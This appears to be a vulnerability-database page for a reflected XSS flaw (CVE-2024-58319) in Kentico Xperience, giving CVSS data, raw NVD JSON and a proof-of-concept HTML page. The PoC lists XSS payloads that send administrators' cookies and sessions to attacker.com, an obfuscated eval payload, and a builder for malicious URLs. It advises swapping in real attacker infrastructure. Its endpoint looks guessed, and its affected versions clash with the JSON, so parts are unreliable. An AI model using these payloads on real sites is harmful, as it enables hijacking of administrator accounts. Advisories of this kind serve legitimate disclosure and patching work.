Security Vulnerability Report
CVE-2024-58319 CVSS 6.1 MEDIUM

CVE-2024-58319

Published: 2025-12-18 20:15:54
Last Modified: 2025-12-27 17:15:46

Description

A reflected cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the Pages dashboard widget configuration dialog. Attackers can exploit this vulnerability to execute malicious scripts in administrative users' browsers.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:* - VULNERABLE
Kentico Xperience < 13.0.235 (with hotfix)
Kentico Xperience < 29.0.0 (latest stable)
All versions with vulnerable Pages dashboard widget component

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2024-58319 PoC - Reflected XSS in Kentico Xperience Pages Dashboard Widget -->
<!-- Target: Kentico Xperience Pages dashboard widget configuration dialog -->
<!-- This PoC demonstrates the reflected XSS vulnerability -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2024-58319 PoC</title>
</head>
<body>
  <h2>CVE-2024-58319 - Kentico Xperience Reflected XSS PoC</h2>

  <!-- Attack Scenario:
       1. Attacker crafts a malicious URL containing XSS payload
       2. Attacker tricks administrator into clicking the link
       3. Malicious JavaScript executes in administrator's browser -->

  <h3>Malicious URL:</h3>
  <pre id="malicious-url"></pre>

  <!-- Payloads are HTML-entity-escaped so the browser displays them as text
       instead of executing them while this page is rendered -->
  <h3>XSS Payloads:</h3>
  <ul>
    <li>Basic: <code>" onfocus="alert(document.domain)" autofocus</code></li>
    <li>Cookie Theft: <code>&lt;script&gt;fetch('https://attacker.com/steal?c='+document.cookie)&lt;/script&gt;</code></li>
    <li>Event Handler: <code>&lt;img src=x onerror=alert(document.cookie)&gt;</code></li>
    <li>DOM Manipulation: <code>&lt;svg/onload=eval(atob('YWxlcnQoJ1hTUyBwb2MgdXNlZCcpOw=='))&gt;</code></li>
  </ul>

  <h3>Proof of Concept URL:</h3>
  <button onclick="generatePOC()">Generate PoC URL</button>
  <br><br>
  <a id="poc-link" href="#" target="_blank">Click here to test (simulated)</a>

  <script>
    // Simulate PoC URL construction
    function generatePOC() {
      // Kentico Xperience typical URL patterns
      var baseUrl = window.location.origin + "/CMSPages/DashboardWidgetConfig.aspx";
      // "<\/script>" is escaped so the literal does not terminate this <script> element
      var xssPayload = '<script>alert("XSS CVE-2024-58319")<\/script>';
      var maliciousUrl = baseUrl + '?widgetId=test&config=' + encodeURIComponent(xssPayload);
      document.getElementById('malicious-url').textContent = maliciousUrl;
      document.getElementById('poc-link').href = maliciousUrl;
      console.log('PoC URL Generated: ' + maliciousUrl);
      console.log('Note: Actual exploitation requires valid Kentico Xperience installation');
    }

    // Cookie stealing payload
    var stealCookiePayload = "<script>fetch('https://attacker-controlled-site.com/log?cookie='+btoa(document.cookie))<\/script>";

    // Session hijacking payload
    var sessionHijackPayload = "<img src=x onerror=\"fetch('https://attacker.com/steal?session='+document.cookie)\">";
  </script>

  <!-- Notes for security researchers:
       1. Replace 'attacker-controlled-site.com' with actual attacker infrastructure
       2. URL encode all special characters properly
       3. Test in authorized penetration testing environment only
       4. Verify vulnerability exists before reporting -->
</body>
</html>

References

https://devnet.kentico.com/download/hotfixes (Product)
https://www.vulncheck.com/advisories/kentico-xperience-pages-dashboard-widget-reflected-xss (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58319", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:53.780", "lastModified": "2025-12-27T17:15:46.297", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious scripts via the Pages dashboard widget configuration dialog. Attackers can exploit this vulnerability to execute malicious scripts in administrative users' browsers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.0.160", "matchCriteriaId": "9C72165F-2961-48F8-AC6E-337C322F3606"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-pages-dashboard-widget-reflected-xss", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}